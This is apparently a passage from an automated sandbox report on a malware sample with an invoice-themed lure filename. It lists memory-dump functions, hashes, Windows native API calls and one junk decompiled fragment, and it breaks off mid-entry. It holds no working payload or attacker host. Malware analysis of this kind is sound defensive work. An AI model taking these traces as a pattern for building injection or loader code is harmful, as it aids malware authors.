                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9c2b890bb15da584a6b0f76d1c12d05b1694a09df3e8a62638dc0f87e5ee202c
                                                                      • Instruction ID: 5b2bb30fbfc385dc26eabc30363c3087f614e113719aa69298cbca12daacccaa
                                                                      • Opcode Fuzzy Hash: 9c2b890bb15da584a6b0f76d1c12d05b1694a09df3e8a62638dc0f87e5ee202c
                                                                      • Instruction Fuzzy Hash: CFA11674E042198BDF04CFA9C5466AEFBF2AF88314F248565D815FB214E7349E42CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05831911, Relevance: .2, Instructions: 243COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2838cc91b3b1334cb1836870d87ae8a4a5e1f91677aec304852b739a28df952b
                                                                      • Instruction ID: f0408ae06c0920ba69cef782b0923f9aa9cbff9fadae97752f4d1d884a5add7f
                                                                      • Opcode Fuzzy Hash: 2838cc91b3b1334cb1836870d87ae8a4a5e1f91677aec304852b739a28df952b
                                                                      • Instruction Fuzzy Hash: A9A11674E052198FDF04CFA9C58669EFBF2AF88304F248566D814EB254E7349E42CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012AC3A0, Relevance: .2, Instructions: 217COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 457cf124553076b887b852b6ba056365b4eb28ca2e92cb1391e1edfc1a8ce9e6
                                                                      • Instruction ID: 9b9201fdc055be13c41d68433f67a765136771c58df071cdf2083ba79754161d
                                                                      • Opcode Fuzzy Hash: 457cf124553076b887b852b6ba056365b4eb28ca2e92cb1391e1edfc1a8ce9e6
                                                                      • Instruction Fuzzy Hash: BFC11CB1A237558BD710DF65F89E1893FA1BF85328F506208F2612BAD2DFB81446CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05831D98, Relevance: .2, Instructions: 192COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 674306f00c1b75e33bc65e3661efb1ae6582b038a9e51ea0dc511b224114825d
                                                                      • Instruction ID: 2103ca12f7ad7a4d338f8a4afeebd964e071ab24f58a5a94e9b274aafb223168
                                                                      • Opcode Fuzzy Hash: 674306f00c1b75e33bc65e3661efb1ae6582b038a9e51ea0dc511b224114825d
                                                                      • Instruction Fuzzy Hash: 85716C74E0521A8FCB04CFE9C84A6AEFBF2BB88314F14C826D815E7254D7349A46CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05831DF0, Relevance: .2, Instructions: 172COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b5c1dc727698f1ee3e6477043dad3f9e7c9e94f8b7d13ff7cbef91aa45b904fc
                                                                      • Instruction ID: 5ab9783b9330c9a1a9b0ac72cf84178f1f27f7c3ea9574be283384b8de1e9c71
                                                                      • Opcode Fuzzy Hash: b5c1dc727698f1ee3e6477043dad3f9e7c9e94f8b7d13ff7cbef91aa45b904fc
                                                                      • Instruction Fuzzy Hash: F5614A74E0521A8FCB04CFE9C9869AEFBF2BB88310F14D825D815E7254D7389A45CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05830FF4, Relevance: .1, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5b4fe64cc709bfea4ee31a4effe761bd3f01c830670143005cd36dba65ae918b
                                                                      • Instruction ID: 4827950026f9fd74266e3030ebfc609d44530439994095e7f8799806b8550b9e
                                                                      • Opcode Fuzzy Hash: 5b4fe64cc709bfea4ee31a4effe761bd3f01c830670143005cd36dba65ae918b
                                                                      • Instruction Fuzzy Hash: 57318EB4E15249CFDB18CF6AC8956AEBBF3BF89200F08C46AD808E7255DA345905CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05831038, Relevance: .1, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e56d0539c33bfcb94588a6b30ebadf677e489616ab7a56bd916cfa5d134b8540
                                                                      • Instruction ID: 5968f7e62b1b7359d4fa809ef48a6ab3f3800bdf9bdfecf01221ce030d3cfbe2
                                                                      • Opcode Fuzzy Hash: e56d0539c33bfcb94588a6b30ebadf677e489616ab7a56bd916cfa5d134b8540
                                                                      • Instruction Fuzzy Hash: 04311870E116199BDB18CFAAD845AAEFBB3BB88200F14C06AD908E7254DB705A45CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 009745A8, Relevance: .0, Instructions: 40COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 65%
                                                                      			E009745A8(signed int* __eax, signed char __ecx, signed int __edx, intOrPtr* __esi) {
				signed int* _t3;
				intOrPtr* _t4;
				signed int _t6;
				intOrPtr* _t7;
				signed char _t9;
				signed char _t13;
				intOrPtr* _t16;
				void* _t18;

				_t16 = __esi;
				_t9 = __ecx;
				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
				_t13 = __edx |  *(__edx - 0x62);
				_t3 = __eax;
				if(_t3 >= 0) {
					 *_t3 = _t3 +  *_t3;
					 *0x706f0316 =  *0x706f0316 + _t18;
					 *_t3 = _t3 +  *_t3;
					_push(es);
					 *0x6f081725 = _t3;
					_t3 = 0;
				}
				asm("rol byte [eax], 0x0");
				asm("aas");
				 *_t3 = _t3 +  *_t3;
				_push(es);
				asm("outsd");
				 *(_t9 |  *_t3) =  *(_t9 |  *_t3);
				_push(es);
				 *0xa20a0000 =  *0xa20a0000 + _t3;
				 *_t16 =  *_t16 + _t3;
				_t4 = _t3 -  *_t3;
				 *_t4 =  *_t4 + _t13;
				 *_t4 =  *_t4 + _t4;
				_t6 = _t4 +  *_t4 | 0x00a89b00;
				asm("sldt word [eax]");
				 *_t6 =  *_t6 + _t6;
				asm("adc esi, [eax]");
				_t7 = _t6 +  *_t6;
				if (_t7 >= 0) goto L3;
				 *_t7 =  *_t7 + _t7;
				asm("outsd");
				return _t7;
			}











                                                                      0x009745a8
                                                                      0x009745a8
                                                                      0x009745a9
                                                                      0x009745ab
                                                                      0x009745ae
                                                                      0x009745b0
                                                                      0x009745b4
                                                                      0x009745b6
                                                                      0x009745bc
                                                                      0x009745be
                                                                      0x009745bf
                                                                      0x009745c9
                                                                      0x009745c9
                                                                      0x009745ca
                                                                      0x009745cf
                                                                      0x009745d0
                                                                      0x009745d2
                                                                      0x009745d3
                                                                      0x009745d4
                                                                      0x009745d7
                                                                      0x009745d8
                                                                      0x009745dc
                                                                      0x009745de
                                                                      0x009745e0
                                                                      0x009745e2
                                                                      0x009745e6
                                                                      0x009745eb
                                                                      0x009745ee
                                                                      0x009745f0
                                                                      0x009745f2
                                                                      0x009745f4
                                                                      0x009745f6
                                                                      0x009745ff
                                                                      0x00974600

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.343912512.0000000000972000.00000002.00020000.sdmp, Offset: 00970000, based on PE: true
                                                                      • Associated: 00000000.00000002.343886503.0000000000970000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d1794a2922fe31a207d84325fcbe54dc648705599a518e00cef4ecd0f7ec8b9a
                                                                      • Instruction ID: e435441cfbb61a2d95f01a8477b14e3d9c12e4488cfb246fcb3214a14ec0e94e
                                                                      • Opcode Fuzzy Hash: d1794a2922fe31a207d84325fcbe54dc648705599a518e00cef4ecd0f7ec8b9a
                                                                      • Instruction Fuzzy Hash: 2401F22240E7C14FD7039B748C757963FB69F97254B1E88C7D0C08B1B3D2252A2AD762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: powershell.exe PID: 6932 Parent PID: 6752 powershell.exeCOMMON

                                                                      Executed Functions

                                                                      Function 02E8C5C8, Relevance: 1.6, APIs: 1, Instructions: 112fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 02E8C6F2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.524813327.0000000002E80000.00000040.00000001.sdmp, Offset: 02E80000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 8920874f6640a77d1e84af8ae4cabfffdaadc895ac72783e32b1653eca73b5fa
                                                                      • Instruction ID: 40434378fa37c71fc7c37e17ab223f195dade96cac842ad9f68f3c5960466665
                                                                      • Opcode Fuzzy Hash: 8920874f6640a77d1e84af8ae4cabfffdaadc895ac72783e32b1653eca73b5fa
                                                                      • Instruction Fuzzy Hash: 0E41B0B1A042499FDB04DFA8D845BAEBBB4FF48314F15C16AE518AB381C7749944CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02E8C668, Relevance: 1.6, APIs: 1, Instructions: 62fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 02E8C6F2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.524813327.0000000002E80000.00000040.00000001.sdmp, Offset: 02E80000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 1a003610dc4d386895ed8265ce931f1a0946a6b80057ec8c63f39ff064fa35f0
                                                                      • Instruction ID: 2116020ce8690ac9a6b45c35ab451d733b47cd01e79defbc4f827ab326c04916
                                                                      • Opcode Fuzzy Hash: 1a003610dc4d386895ed8265ce931f1a0946a6b80057ec8c63f39ff064fa35f0
                                                                      • Instruction Fuzzy Hash: 2C2145B6D0061A9FCF10DF99D980AEEFBB0FB48314F14852AE918B3610C375A954CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02E856C0, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(00000000), ref: 02E85738
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.524813327.0000000002E80000.00000040.00000001.sdmp, Offset: 02E80000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: f77827ea2915276f09a076a5a2d983f8c804b94e00f782d7edec1e8407e3830b
                                                                      • Instruction ID: bc430fd2ec97c20e6cf930be2855d78dcfc9d013a437863d593d65d314bfec96
                                                                      • Opcode Fuzzy Hash: f77827ea2915276f09a076a5a2d983f8c804b94e00f782d7edec1e8407e3830b
                                                                      • Instruction Fuzzy Hash: 58215BB4D046599FCB20DFAAD844AEEFBB4FB48324F118219D818A3240C734A945CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02E83FFC, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(00000000), ref: 02E85738
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.524813327.0000000002E80000.00000040.00000001.sdmp, Offset: 02E80000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 98d250f14738c17b0ac4102f5ad5dd304819e3ed2f980d7f2f3984d879b16f08
                                                                      • Instruction ID: fda5dd3991bfdece201b8ad30f69f36d8abfd64ac42e230b7ff8a7f0e4bccf74
                                                                      • Opcode Fuzzy Hash: 98d250f14738c17b0ac4102f5ad5dd304819e3ed2f980d7f2f3984d879b16f08
                                                                      • Instruction Fuzzy Hash: 7C2138B5D046199BCB20DF9AD84579EFBB4FB48224F11C119E819A3340DB74A944CFE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02E8C728, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.524813327.0000000002E80000.00000040.00000001.sdmp, Offset: 02E80000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 57389ba966cdf0bec4ba8a4346160d7af3b13720334e9ff05538fce3d264246e
                                                                      • Instruction ID: 775e28cd62237bcc749b393046e9f6b65b8e26b49b646c43548a07a6d0aca4e2
                                                                      • Opcode Fuzzy Hash: 57389ba966cdf0bec4ba8a4346160d7af3b13720334e9ff05538fce3d264246e
                                                                      • Instruction Fuzzy Hash: 0111E2B28442989FCF11DF94C844BDABBB0FF59308F10A156E559A7260C335D514DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C8D005, Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.520397657.0000000000C8D000.00000040.00000001.sdmp, Offset: 00C8D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dcead3cfcdcb7612de4d8a24bcfeb4bb2e42b4673117753268215c3070109b62
                                                                      • Instruction ID: a4cdaad3832eb2563dd0619294aa85b37a0e52baf80bf080cd25ec66e7e14d71
                                                                      • Opcode Fuzzy Hash: dcead3cfcdcb7612de4d8a24bcfeb4bb2e42b4673117753268215c3070109b62
                                                                      • Instruction Fuzzy Hash: 9001806140D3D05ED7128B258C94762BFB4DF43228F1980DBD884CF2D7C2695C48C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C8D01D, Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.520397657.0000000000C8D000.00000040.00000001.sdmp, Offset: 00C8D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f4912b3bd52bea715e623bc6b5167d9e0a054613b5c52e7003ae2b381a795e29
                                                                      • Instruction ID: 105b1a65fe089af1d4feb27c8783728b457d740e39a978a4b1e97325aa5c0f00
                                                                      • Opcode Fuzzy Hash: f4912b3bd52bea715e623bc6b5167d9e0a054613b5c52e7003ae2b381a795e29
                                                                      • Instruction Fuzzy Hash: C40147704083409AD7206F26DC84767BB88EF4132CF188059FD065B2C6C7799D45C7B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: HAWB AND INV.exe PID: 6156 Parent PID: 6752 HAWB AND INV.exeCOMMON

                                                                      Executed Functions

                                                                      Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: B=A$B=A
                                                                      • API String ID: 2738559852-2767357659
                                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                      • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                      • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041825A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: B=A$B=A
                                                                      • API String ID: 2738559852-2767357659
                                                                      • Opcode ID: b24664ea22a8d2677ef3968178266d8f1581f4d8fc20cf31f494d12ab08bef84
                                                                      • Instruction ID: 434eb70047cd20c9a673e5bc859ccb1e0d837d886cba4685f3b49c9f24e11194
                                                                      • Opcode Fuzzy Hash: b24664ea22a8d2677ef3968178266d8f1581f4d8fc20cf31f494d12ab08bef84
                                                                      • Instruction Fuzzy Hash: 9DF0FFB2200149AFCB14DF98D890CEB77A9EF8C314B15865DFD4D97215CA34E855CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: 4621568ce873deb1313e0de628d8eea835b94914331d8dec1d02c8297636d00b
                                                                      • Instruction ID: 8e2e50af6c7290f8a7d332b64cb89e442f3123e8e35f5a3a3d0f6bb0042b2ce1
                                                                      • Opcode Fuzzy Hash: 4621568ce873deb1313e0de628d8eea835b94914331d8dec1d02c8297636d00b
                                                                      • Instruction Fuzzy Hash: 360112B5D4010DBBDF10DAE5EC42FDEB378AB54318F0041A9E908A7281F635EB54C795
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                      • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                      • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004181AA, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: ffd852a01f095e9be796bc636078d166d05e6badc43085123a98eb0a5d9cd2d4
                                                                      • Instruction ID: 191349821cd4a0c463ebb788c8edb38b2e0ec3cef2d015b4f138c3b9e46af32c
                                                                      • Opcode Fuzzy Hash: ffd852a01f095e9be796bc636078d166d05e6badc43085123a98eb0a5d9cd2d4
                                                                      • Instruction Fuzzy Hash: 33F01FB2204149ABCB48DF98DC84CEB77A9BF8C314B14828DFA1D97206C630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                      • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                      • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                      • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                      • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01219910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: c00765c4e760d3cae1c2c3db117657141161a15b09d45a08a5295d9aba3f3056
                                                                      • Instruction ID: b812f75fbff491c7402776a2b738535134967762e89e2ca567daa203b1419bff
                                                                      • Opcode Fuzzy Hash: c00765c4e760d3cae1c2c3db117657141161a15b09d45a08a5295d9aba3f3056
                                                                      • Instruction Fuzzy Hash: B29002B121101812D14071A9440474A0005A7D0351F61C011E9054654EC6998DD577A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 77d00cf47570cfeabdcbe787e43621eb5022c760c4db7a11da993009644ae687
                                                                      • Instruction ID: b93982c9164e77b284a665ba977398cb3e7cb2a53989272cf4c17cefbdca3274
                                                                      • Opcode Fuzzy Hash: 77d00cf47570cfeabdcbe787e43621eb5022c760c4db7a11da993009644ae687
                                                                      • Instruction Fuzzy Hash: F09002B135101852D10061A94414B0A0005E7E1351F61C015E5054654DC659CC527266
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01219860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: d8ae465141740501659d98d1a2b90e54e14b3c9ee7d26f3f1d4a7f6c7cecf017
                                                                      • Instruction ID: db655c52d6fc49ccd65074be8c8629ba165ba2c82548e583f6def6a39f610678
                                                                      • Opcode Fuzzy Hash: d8ae465141740501659d98d1a2b90e54e14b3c9ee7d26f3f1d4a7f6c7cecf017
                                                                      • Instruction Fuzzy Hash: 8990027121101823D11161A9450470B0009A7D0291FA1C412E4414658DD6968952B261
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01219840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: d7e468a13f911ea09dfffdd2d0b8416e4cfd1568ed018b7af2ba5bf4cb66d0b0
                                                                      • Instruction ID: aefe46d8c5aadf57448340830c31d3e7b8ab21a53bd8bfc2737c3aef44b3866c
                                                                      • Opcode Fuzzy Hash: d7e468a13f911ea09dfffdd2d0b8416e4cfd1568ed018b7af2ba5bf4cb66d0b0
                                                                      • Instruction Fuzzy Hash: 16900271252055625545B1A9440450B4006B7E02917A1C012E5404A50CC5669856E761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012198F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 09494b9af6aa0a3809c7a5fc3038c649a87d77d241445695380b7bcccca39072
                                                                      • Instruction ID: 7482299ea703d13cb9417e703b74e653d275360af7e22e7e453439fd9a7fee62
                                                                      • Opcode Fuzzy Hash: 09494b9af6aa0a3809c7a5fc3038c649a87d77d241445695380b7bcccca39072
                                                                      • Instruction Fuzzy Hash: 1A90027161101912D10171A9440461A000AA7D0291FA1C022E5014655ECA658992B271
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01219A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 467905f462fcfce02dbe524272060be63837acd9394975aeebdd706450292fcd
                                                                      • Instruction ID: 957fc51a35d64a41d3402705c64fa926c58c27706c16b240490dce88c4e4ece5
                                                                      • Opcode Fuzzy Hash: 467905f462fcfce02dbe524272060be63837acd9394975aeebdd706450292fcd
